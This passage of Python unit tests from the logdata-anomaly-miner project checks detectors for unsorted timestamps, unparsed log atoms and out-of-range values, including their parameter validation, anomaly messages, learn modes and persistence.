[self.stream_printer_event_handler], exit_on_error_flag="True") self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, [self.stream_printer_event_handler], exit_on_error_flag=123) self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, [self.stream_printer_event_handler], exit_on_error_flag=123.22) self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, [self.stream_printer_event_handler], exit_on_error_flag={"id": "Default"}) self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, [self.stream_printer_event_handler], exit_on_error_flag=["Default"]) self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, [self.stream_printer_event_handler], exit_on_error_flag=[]) self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, [self.stream_printer_event_handler], exit_on_error_flag=()) self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, [self.stream_printer_event_handler], exit_on_error_flag=set()) TimestampsUnsortedDetector(self.aminer_config, [self.stream_printer_event_handler], exit_on_error_flag=True) self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=None) self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=b"True") self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline="True") self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=123) self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=123.22) self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline={"id": "Default"}) self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=["Default"]) self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=[]) self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=()) self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=set()) TimestampsUnsortedDetector(self.aminer_config, [self.stream_printer_event_handler], output_logline=True) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/UnparsedAtomHandlersTest.py000066400000000000000000000161271500476301700311070ustar00rootroot00000000000000import unittest from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector import time from aminer.parsing.ParserMatch import ParserMatch from aminer.input.LogAtom import LogAtom from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler, VerboseUnparsedAtomHandler from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext, DummySequenceModelElement from datetime import datetime class SimpleUnparsedAtomHandlerTest(TestBase): """Unittests for the SimpleUnparsedAtomHandler.""" datetime_format_string = "%Y-%m-%d %H:%M:%S" calculation = b"256 * 2 = 512" def test1receive_atom_SimpleUnparsedAtomHandler(self): """Test if the SimpleUnparsedAtomHandler can handle matching log atoms and not matching log atoms.""" t = time.time() fdme = DummyFixedDataModelElement("s1", self.calculation) new_match_path_detector1 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False) # match exists match_context = DummyMatchContext(self.calculation) match_element = fdme.get_match_element("match", match_context) log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), t, new_match_path_detector1) simple_unparsed_atom_handler = SimpleUnparsedAtomHandler([self.stream_printer_event_handler]) self.assertFalse(simple_unparsed_atom_handler.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), "") # match does not exist log_atom = LogAtom(match_element.match_object, None, t, new_match_path_detector1) self.assertTrue(simple_unparsed_atom_handler.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), f'{datetime.fromtimestamp(t).strftime(self.datetime_format_string)} Unparsed atom received\n' f'{simple_unparsed_atom_handler.__class__.__name__}: "None" (1 lines)\n {self.calculation.decode()}\n\n') self.reset_output_stream() def test2_receive_atom_VerboseUnparsedAtomHandler(self): """Test if the VerboseUnparsedAtomHandler can handle matching log atoms and not matching log atoms.""" t = time.time() fdme = DummyFixedDataModelElement("s1", self.calculation) new_match_path_detector1 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False) # match exists match_context = DummyMatchContext(self.calculation) match_element = fdme.get_match_element("match", match_context) log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), t, new_match_path_detector1) verbose_unparsed_atom_handler = VerboseUnparsedAtomHandler([self.stream_printer_event_handler], fdme) self.assertFalse(verbose_unparsed_atom_handler.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), "") # match does not exist log_atom = LogAtom(match_element.match_object, None, t, new_match_path_detector1) self.assertTrue(verbose_unparsed_atom_handler.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), f'{datetime.fromtimestamp(t).strftime(self.datetime_format_string)} Unparsed atom received\n' f'{verbose_unparsed_atom_handler.__class__.__name__}: "None" (1 lines)\n Starting match update on "' f'{self.calculation.decode()}"\n Removed: "{self.calculation.decode()}", remaining 0 bytes\n Shortest unmatched ' f'data: ""\n{self.calculation.decode()}\n\n') self.reset_output_stream() def test3validate_parameters_SimpleUnparsedAtomHandler(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(TypeError, SimpleUnparsedAtomHandler, ["default"]) self.assertRaises(TypeError, SimpleUnparsedAtomHandler, None) self.assertRaises(TypeError, SimpleUnparsedAtomHandler, "") self.assertRaises(TypeError, SimpleUnparsedAtomHandler, b"Default") self.assertRaises(TypeError, SimpleUnparsedAtomHandler, True) self.assertRaises(TypeError, SimpleUnparsedAtomHandler, 123) self.assertRaises(TypeError, SimpleUnparsedAtomHandler, 123.3) self.assertRaises(TypeError, SimpleUnparsedAtomHandler, {"id": "Default"}) self.assertRaises(TypeError, SimpleUnparsedAtomHandler, ()) self.assertRaises(TypeError, SimpleUnparsedAtomHandler, set()) SimpleUnparsedAtomHandler([self.stream_printer_event_handler]) def test4validate_parameters_VerboseUnparsedAtomHandler(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" parsing_model = DummySequenceModelElement("seq", [DummyFixedDataModelElement("s1", b"string"), DummyFixedDataModelElement("sp", b" ")]) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, ["default"], parsing_model) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, None, parsing_model) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, "", parsing_model) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, b"Default", parsing_model) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, True, parsing_model) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, 123, parsing_model) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, 123.3, parsing_model) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, {"id": "Default"}, parsing_model) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, (), parsing_model) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, set(), parsing_model) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, [self.stream_printer_event_handler], []) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, [self.stream_printer_event_handler], ["default"]) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, [self.stream_printer_event_handler], None) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, [self.stream_printer_event_handler], "") self.assertRaises(TypeError, VerboseUnparsedAtomHandler, [self.stream_printer_event_handler], b"Default") self.assertRaises(TypeError, VerboseUnparsedAtomHandler, [self.stream_printer_event_handler], True) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, [self.stream_printer_event_handler], 123) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, [self.stream_printer_event_handler], 123.3) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, [self.stream_printer_event_handler], {"id": "Default"}) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, [self.stream_printer_event_handler], ()) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, [self.stream_printer_event_handler], set()) VerboseUnparsedAtomHandler([self.stream_printer_event_handler], parsing_model) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/ValueRangeDetectorTest.py000066400000000000000000001067611500476301700305530ustar00rootroot00000000000000import unittest from aminer.analysis.ValueRangeDetector import ValueRangeDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD import time from datetime import datetime class ValueRangeDetectorTest(TestBase): """Unittests for the ValueRangeDetectorDetector.""" def test1receive_atom(self): """ This test case checks the normal detection of new value ranges. The VRD is used to learn intervals and detect values outside of these ranges for two different identifiers. Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ expected_string = '%s Value range anomaly detected\n%s: "None" (%d lines)\n %s\n\n' datetime_format_string = "%Y-%m-%d %H:%M:%S" t = round(time.time(), 3) # Prepare log atoms that represent two entities (id) with floats (value). Anomalies are generated when ranges are first established. # Then, one identifier (a) has a valid value, while the other one (b) has a value outside the range that generates an anomaly. # The following events are generated: # id: a value: 2.5 # id: b value: 5 # id: a value: 4.75 # id: b value: 6.3 # id: a value: 4.25 # id: b value: 3.1 m_1 = MatchElement("/model/id", b"a", b"a", None) m_2 = MatchElement("/model/value", b"2.5", 2.5, None) match_element_1 = MatchElement("/model", b"a2.5", b"a2.5", [m_1, m_2]) parser_match_1 = ParserMatch(match_element_1) log_atom_1 = LogAtom(b"a2.5", parser_match_1, t, None) m_3 = MatchElement("/model/id", b"b", b"b", None) m_4 = MatchElement("/model/value", b"5", 5, None) match_element_2 = MatchElement("/model", b"b5", b"b5", [m_3, m_4]) parser_match_2 = ParserMatch(match_element_2) log_atom_2 = LogAtom(b"b5", parser_match_2, t+1, None) m_5 = MatchElement("/model/id", b"a", b"a", None) m_6 = MatchElement("/model/value", b"4.75", 4.75, None) match_element_3 = MatchElement("/model", b"a4.75", b"a4.75", [m_5, m_6]) parser_match_3 = ParserMatch(match_element_3) log_atom_3 = LogAtom(b"a4.75", parser_match_3, t+2, None) m_7 = MatchElement("/model/id", b"b", b"b", None) m_8 = MatchElement("/model/value", b"6.3", 6.3, None) match_element_4 = MatchElement("/model", b"b6.3", b"b6.3", [m_7, m_8]) parser_match_4 = ParserMatch(match_element_4) log_atom_4 = LogAtom(b"b6.3", parser_match_4, t+3, None) m_9 = MatchElement("/model/id", b"a", b"a", None) m_10 = MatchElement("/model/value", b"4.25", 4.25, None) match_element_5 = MatchElement("/model", b"a4.25", b"a4.25", [m_9, m_10]) parser_match_5 = ParserMatch(match_element_5) log_atom_5 = LogAtom(b"a4.25", parser_match_5, t+4, None) m_11 = MatchElement("/model/id", b"b", b"b", None) m_12 = MatchElement("/model/value", b"3.1", 3.1, None) match_element_6 = MatchElement("/model", b"b3.1", b"b3.1", [m_11, m_12]) parser_match_6 = ParserMatch(match_element_6) log_atom_6 = LogAtom(b"b3.1", parser_match_6, t+5, None) # learn_mode = True, with id_path_list set # Forward log atoms to detector # First value of id (a) should not generate an anomaly # Input: id: a value: 2.5 # Expected output: None value_range_detector = ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], "Default", True, False) value_range_detector.receive_atom(log_atom_1) self.assertEqual(self.output_stream.getvalue(), "") # First value of id (b) should not generate an anomaly # Input: id: b value: 5 # Expected output: None value_range_detector.receive_atom(log_atom_2) self.assertEqual(self.output_stream.getvalue(), "") # Second value of id (a) should generate an anomaly for new range # Input: id: a value: 4.75 # Expected output: Anomaly value_range_detector.receive_atom(log_atom_3) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t+2).strftime(datetime_format_string), value_range_detector.__class__.__name__, 1, log_atom_3.raw_data.decode())) self.reset_output_stream() # Second value of id (b) should generate an anomaly for new range # Input: id: b value: 6.3 # Expected output: Anomaly value_range_detector.receive_atom(log_atom_4) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t+3).strftime(datetime_format_string), value_range_detector.__class__.__name__, 1, log_atom_4.raw_data.decode())) self.reset_output_stream() # Third value of id (a) is in expected range, thus no anomaly is generated # Input: id: a value: 4.25 # Expected output: None value_range_detector.receive_atom(log_atom_5) self.assertEqual(self.output_stream.getvalue(), "") # Third value of id (b) is outside the expected range, thus anomaly is generated value_range_detector.receive_atom(log_atom_6) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t+5).strftime(datetime_format_string), value_range_detector.__class__.__name__, 1, log_atom_6.raw_data.decode())) self.reset_output_stream() # learn_mode = True, without id_path_list set # Forward log atoms to detector # First value of id (a) should not generate an anomaly # Input: id: a value: 2.5 # Expected output: None value_range_detector = ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["/model/value"], "Default", True, False) value_range_detector.receive_atom(log_atom_1) self.assertEqual(self.output_stream.getvalue(), "") # First value of id (b) should not generate an anomaly # Input: id: b value: 5 # Expected output: Anomaly value_range_detector.receive_atom(log_atom_2) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t+1).strftime(datetime_format_string), value_range_detector.__class__.__name__, 1, log_atom_2.raw_data.decode())) self.reset_output_stream() # Second value of id (a) should generate an anomaly for new range # Input: id: a value: 4.75 # Expected output: None value_range_detector.receive_atom(log_atom_3) self.assertEqual(self.output_stream.getvalue(), "") self.reset_output_stream() # Second value of id (b) should generate an anomaly for new range # Input: id: b value: 6.3 # Expected output: Anomaly value_range_detector.receive_atom(log_atom_4) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t+3).strftime(datetime_format_string), value_range_detector.__class__.__name__, 1, log_atom_4.raw_data.decode())) self.reset_output_stream() # Third value of id (a) is in expected range, thus no anomaly is generated # Input: id: a value: 4.25 # Expected output: None value_range_detector.receive_atom(log_atom_5) self.assertEqual(self.output_stream.getvalue(), "") # All values are used in only one path, so this value should not produce an anomaly. value_range_detector.receive_atom(log_atom_6) self.assertEqual(self.output_stream.getvalue(), "") # learn_mode = False value_range_detector = ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], "Default", True, False) value_range_detector.ranges = {"min": {}, "max": {}} # setup value_range_detector.receive_atom(log_atom_1) self.assertEqual(self.output_stream.getvalue(), "") value_range_detector.receive_atom(log_atom_2) self.assertEqual(self.output_stream.getvalue(), "") value_range_detector.learn_mode = False value_range_detector.receive_atom(log_atom_4) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 3).strftime(datetime_format_string), value_range_detector.__class__.__name__, 1, log_atom_4.raw_data.decode())) self.reset_output_stream() # repeating should produce the same result value_range_detector.receive_atom(log_atom_4) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 3).strftime(datetime_format_string), value_range_detector.__class__.__name__, 1, log_atom_4.raw_data.decode())) self.reset_output_stream() # stop_learning_time value_range_detector = ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], "Default", True, False, stop_learning_time=100) log_atom_1.atom_time = t value_range_detector.receive_atom(log_atom_1) log_atom_2.atom_time = t + 99 value_range_detector.receive_atom(log_atom_2) self.assertTrue(value_range_detector.learn_mode) log_atom_3.atom_time = t + 101 value_range_detector.receive_atom(log_atom_3) self.assertFalse(value_range_detector.learn_mode) log_atom_2.atom_time = t + 1 log_atom_3.atom_time = t + 2 # stop_learning_no_anomaly_time value_range_detector = ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], "Default", True, False, stop_learning_no_anomaly_time=100) log_atom_1.atom_time = t value_range_detector.receive_atom(log_atom_1) log_atom_2.atom_time = t + 99 value_range_detector.receive_atom(log_atom_2) self.assertTrue(value_range_detector.learn_mode) log_atom_3.atom_time = t + 100 value_range_detector.receive_atom(log_atom_3) self.assertTrue(value_range_detector.learn_mode) log_atom_4.atom_time = t + 201 value_range_detector.receive_atom(log_atom_4) self.assertFalse(value_range_detector.learn_mode) log_atom_2.atom_time = t + 1 log_atom_3.atom_time = t + 2 log_atom_4.atom_time = t + 2 def test2do_timer(self): """Test if the do_timer method is implemented properly.""" value_range_detector = ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], "Default", True, False) t = time.time() value_range_detector.next_persist_time = t + 400 self.assertEqual(value_range_detector.do_timer(t + 200), 200) self.assertEqual(value_range_detector.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(value_range_detector.do_timer(t + 999), 1) self.assertEqual(value_range_detector.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test3allowlist_event(self): """Test if the allowlist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. value_range_detector = ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], None, "Default", True, output_logline=False) analysis = "Analysis.%s" self.assertRaises(Exception, value_range_detector.allowlist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The ValueRangeDetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, value_range_detector.allowlist_event, analysis % value_range_detector.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # Allowlist event which is in the ignore_list. If a value from the ignore_list is allowlisted, it should be deleted. value_range_detector.ignore_list = ["/s1"] # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(value_range_detector.allowlist_event(analysis % value_range_detector.__class__.__name__, "/s1", None), "Allowlisted path %s." % "/s1") self.assertEqual(value_range_detector.constraint_list, ["/s1"]) self.assertEqual(value_range_detector.ignore_list, []) value_range_detector.learn_mode = False self.assertEqual(value_range_detector.allowlist_event(analysis % value_range_detector.__class__.__name__, "/d1", None), "Allowlisted path %s." % "/d1") self.assertEqual(value_range_detector.constraint_list, ["/s1", "/d1"]) def test4blocklist_event(self): """Test if the blocklist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. value_range_detector = ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], None, "Default", True, output_logline=False) analysis = "Analysis.%s" self.assertRaises(Exception, value_range_detector.blocklist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The ValueRangeDetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, value_range_detector.blocklist_event, analysis % value_range_detector.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # Blocklist event which is in the constraint_list. If a value from the constraint_list is blocklisted, it should be deleted. value_range_detector.constraint_list = ["/s1"] # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(value_range_detector.blocklist_event(analysis % value_range_detector.__class__.__name__, "/s1", None), "Blocklisted path /s1.") self.assertEqual(value_range_detector.ignore_list, ["/s1"]) self.assertEqual(value_range_detector.constraint_list, []) value_range_detector.learn_mode = False self.assertEqual(value_range_detector.blocklist_event(analysis % value_range_detector.__class__.__name__, "/d1", None), "Blocklisted path /d1.") self.assertEqual(value_range_detector.ignore_list, ["/s1", "/d1"]) def test5persistence(self): """Test the do_persist and load_persistence_data methods.""" value_range_detector = ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], "Default", True, False) # Prepare log atoms that represent two entities (id) with floats (value). Anomalies are generated when ranges are first established. # Then, one identifier (a) has a valid value, while the other one (b) has a value outside the range that generates an anomaly. # The following events are generated: # id: a value: 2.5 # id: b value: 5 # id: a value: 4.75 # id: b value: 6.3 # id: a value: 4.25 # id: b value: 3.1 m_1 = MatchElement("/model/id", b"a", b"a", None) m_2 = MatchElement("/model/value", b"2.5", 2.5, None) match_element_1 = MatchElement("/model", b"a2.5", b"a2.5", [m_1, m_2]) parser_match_1 = ParserMatch(match_element_1) log_atom_1 = LogAtom(b"a2.5", parser_match_1, 1, None) m_3 = MatchElement("/model/id", b"b", b"b", None) m_4 = MatchElement("/model/value", b"5", 5, None) match_element_2 = MatchElement("/model", b"b5", b"b5", [m_3, m_4]) parser_match_2 = ParserMatch(match_element_2) log_atom_2 = LogAtom(b"b5", parser_match_2, 2, None) m_5 = MatchElement("/model/id", b"a", b"a", None) m_6 = MatchElement("/model/value", b"4.75", 4.75, None) match_element_3 = MatchElement("/model", b"a4.75", b"a4.75", [m_5, m_6]) parser_match_3 = ParserMatch(match_element_3) log_atom_3 = LogAtom(b"a4.75", parser_match_3, 3, None) m_7 = MatchElement("/model/id", b"b", b"b", None) m_8 = MatchElement("/model/value", b"6.3", 6.3, None) match_element_4 = MatchElement("/model", b"b6.3", b"b6.3", [m_7, m_8]) parser_match_4 = ParserMatch(match_element_4) log_atom_4 = LogAtom(b"b6.3", parser_match_4, 4, None) m_9 = MatchElement("/model/id", b"a", b"a", None) m_10 = MatchElement("/model/value", b"4.25", 4.25, None) match_element_5 = MatchElement("/model", b"a4.25", b"a4.25", [m_9, m_10]) parser_match_5 = ParserMatch(match_element_5) log_atom_5 = LogAtom(b"a4.25", parser_match_5, 5, None) m_11 = MatchElement("/model/id", b"b", b"b", None) m_12 = MatchElement("/model/value", b"3.1", 3.1, None) match_element_6 = MatchElement("/model", b"b3.1", b"b3.1", [m_11, m_12]) parser_match_6 = ParserMatch(match_element_6) log_atom_6 = LogAtom(b"b3.1", parser_match_6, 6, None) value_range_detector.receive_atom(log_atom_1) value_range_detector.receive_atom(log_atom_2) value_range_detector.receive_atom(log_atom_3) value_range_detector.receive_atom(log_atom_4) value_range_detector.receive_atom(log_atom_5) value_range_detector.receive_atom(log_atom_6) value_range_detector.do_persist() value_range_detector1 = ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], "Default", True, False) self.assertEqual(value_range_detector.ranges, value_range_detector1.ranges) self.assertEqual(value_range_detector1.ranges, {"min": {("a",): 2.5, ("b",): 3.1}, "max": {("a",): 4.75, ("b",): 6.3}}) with open(value_range_detector.persistence_file_name, "r") as f: self.assertEqual(f.read(), """{"string:min": {"tuple:('a',)": 2.5, "tuple:('b',)": 3.1}, "string:max": {"tuple:('a',)": 4.75, "tuple:('b',)": 6.3}}""") value_range_detector.ranges = {"min": {}, "max": {}} value_range_detector.load_persistence_data() self.assertEqual(value_range_detector.ranges, {"min": {("a",): 2.5, ("b",): 3.1}, "max": {("a",): 4.75, ("b",): 6.3}}) other = ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], "Default", False, False) self.assertEqual(value_range_detector.ranges, other.ranges) def test6validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, ["default"], ["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, None, ["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, "", ["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, b"Default", ["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, True, ["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, 123, ["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, 123.3, ["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, {"id": "Default"}, ["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, (), ["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, set(), ["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], "") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], b"Default") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], True) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], 123) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], 123.22) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], {"id": "Default"}) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ()) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], set()) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"]) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], None) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], []) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], target_path_list="") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], target_path_list=b"Default") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], target_path_list=True) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], target_path_list=123) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], target_path_list=123.22) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], target_path_list={"id": "Default"}) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], target_path_list="Default") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], target_path_list=()) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], target_path_list=set()) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], target_path_list=["Default"]) self.assertRaises(ValueError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], persistence_id="") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], persistence_id=None) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], persistence_id=b"Default") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], persistence_id=True) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], persistence_id=123) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], persistence_id=123.22) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], persistence_id={"id": "Default"}) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], persistence_id=["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], persistence_id=[]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], persistence_id=()) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], persistence_id=set()) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], persistence_id="Default") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=b"True") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode="True") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=123) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=123.22) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode={"id": "Default"}) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=[]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=()) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=set()) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], output_logline=None) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], output_logline=b"True") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], output_logline="True") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], output_logline=123) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], output_logline=123.22) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], output_logline={"id": "Default"}) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], output_logline=["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], output_logline=[]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], output_logline=()) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], output_logline=set()) 